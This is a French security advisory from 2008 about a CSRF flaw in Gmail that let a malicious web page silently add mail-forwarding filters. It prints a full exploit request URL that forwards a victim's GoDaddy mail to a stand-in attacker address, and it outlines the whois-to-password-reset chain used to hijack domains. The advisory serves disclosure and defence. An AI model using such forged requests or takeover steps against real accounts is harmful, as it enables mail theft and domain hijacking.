Gmail exploit may allow attackers to forward e-mail

– Date : 24 Novembre 2008

– Programme : Gmail

– Gravité : Elevée

– Description :

Une vulnérabilité a été découverte sur la messagerie en ligne GMail. Une personne malveillante est en mesure de rediriger les emails reçus dans une boite GMail par la simple visualisation d’une page web malicieuse.

La vulnérabilité affectant la messagerie GMail est une faille de type CSRF (Cross Site Request Forgery), pour plus d’informations sur le fonctionnement voir l’article XMCO CSRF [1]. Cette attaque permet au pirate de forcer la personne visualisant sa page web malicieuse à effectuer une requête HTTP.

La requête HTTP suivante permet de rediriger les emails en provenance de support@godaddy.com vers hacker@hacker.com

http://mail.google.com/mail/
 ?ui=2
&ik=ad7df7dc23 (identifiant unique du compte google)
&at=xn3j35svndkg48yp2qgmpt99ivcqdc (valeur du cookie de session GMAIL_AT)
&view=up
&act=cf
&rt=h
&zx=pjo6fg-k2ljzh&search=cf
&cf1_from=support%40godaddy.com
&cf2_emc=true&cf2_email=hacker%40hacker.com
&cf2_tr=true

Cette faille aurait permis à des pirates de rediriger des sites web vers des serveurs tiers. Les noms de domaine victimes seraient en majeure partie enregistrés auprès de la société GoDaddy.com. Près de 1000 sites internet auraient été compromis selon une première estimation.

Voici comment les attaquants ont procédé.

Tout d’abord, les propriétaires des domaines contenant une adresse GMail ont été sélectionné. Cette information est publique et disponible via un simple whois.

Ils ont ensuite envoyé à ces personnes un email les incitant à suivre un lien malicieux créant à leur insu un filtre GMail redirigeant les emails de leur hébergeur vers les messageries pirates.

Enfin, les pirates sont allés sur le site de l’hébergeur indiquant avoir perdu le mot de passe de leur compte, et spécifiant l’adresse GMail de la victime.

L’hébergeur envoyait alors le nouveau de mot de passe sur le compte GMail piraté qui renvoyait cette information aux pirates. Ceux-ci ont alors changé les mots de passe des comptes et modifié le contenu des sites internet.

Cette technique de piratage de compte GMail n’est cependant pas une nouveauté. En effet, les premières vulnérabilités permettant d’ajouter à l’insu d’un utilisateur, des filtres de messagerie, ont été exploité courant septembre 2007 [4].

– Référence :

[1] http://www.xmcopartners.com/article-attaque-CSRF.html
[2] http://geekcondition.com/2008/11/23/gmail-security-flaw-proof-of-concept/
[3] http://www.makeuseof.com/tag/breaking-gmail-security-flaw-more-domains-get-stollen/
[4] http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

– Correction :

Même si cette attaque ne ciblait pas spécifiquement les clients français, nous vous recommandons de vérifier que des filtres n’ont pas été ajouté à votre insu dans votre messagerie GMail.

– Lien extranet XMCO :

http://xmcopartners.com/veille/client/index.xmco?nv=1227547852